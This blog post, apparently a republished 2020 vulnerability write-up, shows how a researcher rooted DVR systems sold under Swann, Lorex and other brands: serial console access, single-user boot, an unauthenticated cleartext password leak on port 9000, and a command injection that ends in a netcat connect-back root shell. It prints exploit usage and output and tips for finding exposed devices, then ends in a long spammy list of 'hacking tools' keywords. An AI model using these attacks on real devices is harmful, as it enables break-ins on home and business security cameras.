Friday, August 28, 2020

Swann Song - DVR Insecurity

"Swan song" is a metaphorical phrase for a final gesture, effort, or performance given just before death or retirement. This post serves as the "swan song" for a whole slew of DVR security systems. With that being said, I will refer to the lyrical master MC Hammer, lets turn this mutha' out.

I recently had a chance to get my hands on a 4 channel DVR system system sold under a handful of company banners (4/8/16 channels) - Swann, Lorex, Night Owl, Zmodo, URMET, kguard security, etc. A few device model numbers are - DVR04B, DVR08B, DVR-16CIF, DVR16B
After firing up the device and putting it on the network I noticed that it was running a telnet server, unfortunately the device does not appear to come configured with an easy/weak login :(. Time to open it up and see whats going on :)

After opening the device up something grabbed my attention right away....

The highlighted header looked like a pretty good possibility for a serial port, time to break out the multi-meter and check. After a couple power cycles, the header was indeed a serial port :)

After hooking up my usb to serial breakout board to the device serial port and guessing at the following serial settings: 115200 8-N-1 , I was stuck looking at a login prompt without a working login or password.

Lucky for me the device startup can be reconfigured using the u-boot environment. The environment variable "bootargs" can be adjusted to boot the linux system into single user mode by appending "single" to the end of the existing settings:
setenv bootargs mem=68M console=ttyAMA0,115200 root=1f01 rootfstype=jffs2 mtdparts=physmap-flash.0:4M(boot),12M(rootfs),14M(app),2M(para) busclk=220000000 single



This change to the bootargs variable is only temporary at this point, if we were to power cycle the device the change would be lost. It is possible to write these changes to the device, but in this case we only want to boot into single user mode once. To boot the device you need to tell the boot loader where the kernel exists in memory, this value can be found in the default environment variable "bootdcmd".


Once the device is booted up in single user mode, the root password can be reset and the device can be rebooted. Telnet now works, but what fun is that when these devices don't normally expose telnet to the internet :). Now for the real fun...looking at the device the default configuration is setup to auto-magically use the power of the dark lord satan (uPnP) to map a few ports on your router (if it supports uPnP). One of the ports that it will expose is for the web (activeX) application and the other is the actual comms channel the device uses (port 9000). The first item I looked at was the web application that is used to view the video streams remotely and configure the device. The first thing that I found with this lovely device is that the comms channel (9000) did not appear to do any authentication on requests made to it...Strike 1. I imagine the activeX application that is used to connect to the device could be patched to just skip the login screen, but that seems like a lot of work, especially when there are much easier ways in. The next thing I saw was a bit shocking...when you access the application user accounts page the device sends the application all the information about the accounts stored on the device. This includes the login and password. In clear text. Strike 2. I created a small PoC in python that will pull the password from a vulnerable device:
python getPass.py 192.168.10.69
[*]Host: 192.168.10.69
[+]Username: admin
[+]Password: 123456
Script can be found here.

After owning the device at the "application" level, I figured it was time to go deeper.

Port 9000 is run by a binary named 'raysharpdvr'. I pulled the binary off the device and started going through it looking for interesting stuff. First thing I noticed was the device was using the "system" call to carry out some actions, after chasing down these calls and not seeing much, the following popped up:


"sprintf" with user input into a "system", that'll do it. Couple problems to overcome with this. First in order to use this vector for command injection you must configure the device to use "ppp" - this will cause the device to go offline and we will not be able to interact with it further :(. We can get around this issue by injecting a call to the dhcp client appliction ("udhcpc") - this will cause the device to use dhcp to get its network information bypassing the previous "ppp" config. The other issue is once we have reconfigured the device to run our command, it needs to be restarted before it will execute (its part of the init scripts). The application does not actually provide a way to reboot the device using the web interface, there is a section that says 'reboot', but when it is triggered nothing happens and some debugging information displayed in the serial console saying the functionality is not implemented. Lucky for us there are plenty of overflow bugs in this device that will lead to a crash :). The device has a watchdog that polls the system to check if the "raysharpdvr" application is running and if it does not see it, it initiates a system reboot - very helpful. With those two issues out of the way the only thing left is HOW to talk to our remote root shell that is waiting for us....luckily the device ships with netcat built into busybox, -e flag and all :)
Usage: sploit.py <target> <connectback host> <connectback port>
$ python sploit.py 192.168.10.69 192.168.10.66 9999
[*]Sending Stage 1
[*]Sending Stage 2
[*]Rebooting the server with crash....
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:9999
Strike 3, get this weak shit off my network. The script can be found here. The script relies on the web application running on port 80, this is not always the case so you may need to adjust the script to fix if your device listens on another port. It is also worth noting that it may take a few minutes for the device to reboot and connect back to you.
Unfortunately the web server that runs on this device does not behave correctly (no response headers) so I do not believe finding these online is as easy as searching shodan, however it is possible to fingerprint vulnerable devices by looking for hosts with port 9000 open.

tl;dr; A whole slew of security dvr devices are vulnerable to an unauthenticated login disclosure and unauthenticated command injection.

More info


  1. Hacker Tools For Pc
  2. Hacker Tools Github
  3. Hack Tool Apk
  4. Hack Tools 2019
  5. Hacking Tools Free Download
  6. Hack Tools For Ubuntu
  7. Pentest Tools Alternative
  8. Tools For Hacker
  9. Hack Tools Online
  10. Hacker Security Tools
  11. New Hacker Tools
  12. Github Hacking Tools
  13. Hacking Tools Pc
  14. Physical Pentest Tools
  15. Hacking Tools Download
  16. Pentest Tools Tcp Port Scanner
  17. Hack Tools For Pc
  18. Hacker Tools For Pc
  19. Tools 4 Hack
  20. How To Install Pentest Tools In Ubuntu
  21. Pentest Tools Port Scanner
  22. Hackrf Tools
  23. Bluetooth Hacking Tools Kali
  24. Hacking Tools Kit
  25. Hack Rom Tools
  26. Hacker Tools Hardware
  27. Hacker Tools List
  28. Kik Hack Tools
  29. Hacker Tools Free
  30. Hacking Tools For Pc
  31. Hacking Tools For Windows Free Download
  32. Termux Hacking Tools 2019
  33. Hacker Tools For Mac
  34. Android Hack Tools Github
  35. Hack Tools For Mac
  36. Android Hack Tools Github
  37. Hack Tools For Windows
  38. Pentest Tools For Ubuntu
  39. Hack App
  40. Best Hacking Tools 2019
  41. Hacks And Tools
  42. Hacker Tools Software
  43. Top Pentest Tools
  44. Hack Tools Download
  45. Hack Tools Github
  46. Pentest Tools Free
  47. Hacking Tools Pc
  48. Pentest Tools Github
  49. Pentest Tools Open Source
  50. New Hacker Tools
  51. Pentest Tools Nmap
  52. Hackers Toolbox
  53. Hack Tools Github
  54. Pentest Tools Port Scanner
  55. Black Hat Hacker Tools
  56. Pentest Box Tools Download
  57. Hacker Tools List
  58. Hacking Tools Hardware
  59. Pentest Tools Tcp Port Scanner
  60. Hacker Tools 2019
  61. Hackrf Tools
  62. Usb Pentest Tools
  63. Hacking Tools Name
  64. Hacking App
  65. Hacker Tools 2020
  66. Hack Tools For Games
  67. Tools Used For Hacking
  68. Pentest Tools For Windows
  69. Hacking Tools For Pc
  70. Pentest Tools Download
  71. Hacking Tools Download
  72. Pentest Tools Open Source
  73. Hack Tools Online
  74. Hacking Tools For Windows
  75. Game Hacking
  76. Hacker Tools
  77. Hack Tools For Ubuntu
  78. Tools 4 Hack
  79. Pentest Tools Framework
  80. Hack Tools For Pc
  81. Pentest Tools Port Scanner
  82. Pentest Tools List
  83. Hacker Techniques Tools And Incident Handling
  84. Pentest Tools For Windows
  85. Black Hat Hacker Tools
  86. Pentest Tools Free
  87. Github Hacking Tools
  88. How To Install Pentest Tools In Ubuntu
  89. Hack Tools Github
  90. Top Pentest Tools
  91. Pentest Automation Tools
  92. Install Pentest Tools Ubuntu
  93. Physical Pentest Tools
  94. Hackrf Tools
  95. Pentest Tools Framework
  96. Hacking Tools For Games
  97. What Is Hacking Tools
  98. Hack Apps
  99. Hack Tools Online
  100. Easy Hack Tools
  101. Game Hacking
  102. Hacking Tools For Pc
  103. Hacker Tools For Windows
  104. Hacking Tools Online
  105. Pentest Tools Framework
  106. Pentest Tools Open Source
  107. Pentest Tools For Android
  108. Hacking Tools Pc
  109. Hacking Tools
  110. Pentest Tools For Windows
  111. Hacking Tools Download
  112. Hack Website Online Tool
  113. Hacker Tools Windows
  114. Black Hat Hacker Tools
  115. Hacking Tools
  116. Hacker Tool Kit
  117. Hack Rom Tools
  118. Kik Hack Tools
  119. Game Hacking
  120. Hak5 Tools
  121. Hacking Tools Pc
  122. Hacking Tools For Pc
  123. Pentest Tools Review
  124. Best Hacking Tools 2020
  125. Best Pentesting Tools 2018
  126. Hacker Tools Online
  127. Hacker Tools Free
  128. Hacker Tools 2020
  129. Hacking Tools Kit
  130. Tools 4 Hack
  131. Underground Hacker Sites
  132. Hack Website Online Tool
  133. Hacking Tools For Pc
  134. Pentest Tools For Ubuntu
  135. Hacker Hardware Tools
  136. Pentest Tools Website
  137. Hacker
  138. Hacking Tools 2020
  139. Computer Hacker
  140. Hacking Tools Pc
  141. Hackers Toolbox
  142. Pentest Tools Subdomain
  143. Best Hacking Tools 2019
  144. Hacking Tools Pc
  145. Hacking Tools And Software
  146. Hacker Tools Windows
  147. Pentest Tools Github
  148. Hack Tools
  149. Hackrf Tools
  150. Pentest Tools List
  151. Pentest Box Tools Download
  152. Hacker Tools Mac
  153. Pentest Tools Linux
  154. Hack Tool Apk No Root
  155. Hacker Tools Mac
  156. Hacking Tools For Kali Linux
  157. Hacker Tools For Mac
  158. Hacking Tools For Games
  159. Nsa Hack Tools
  160. Hacker Tools Linux
  161. Nsa Hacker Tools
  162. Hack Rom Tools

No comments: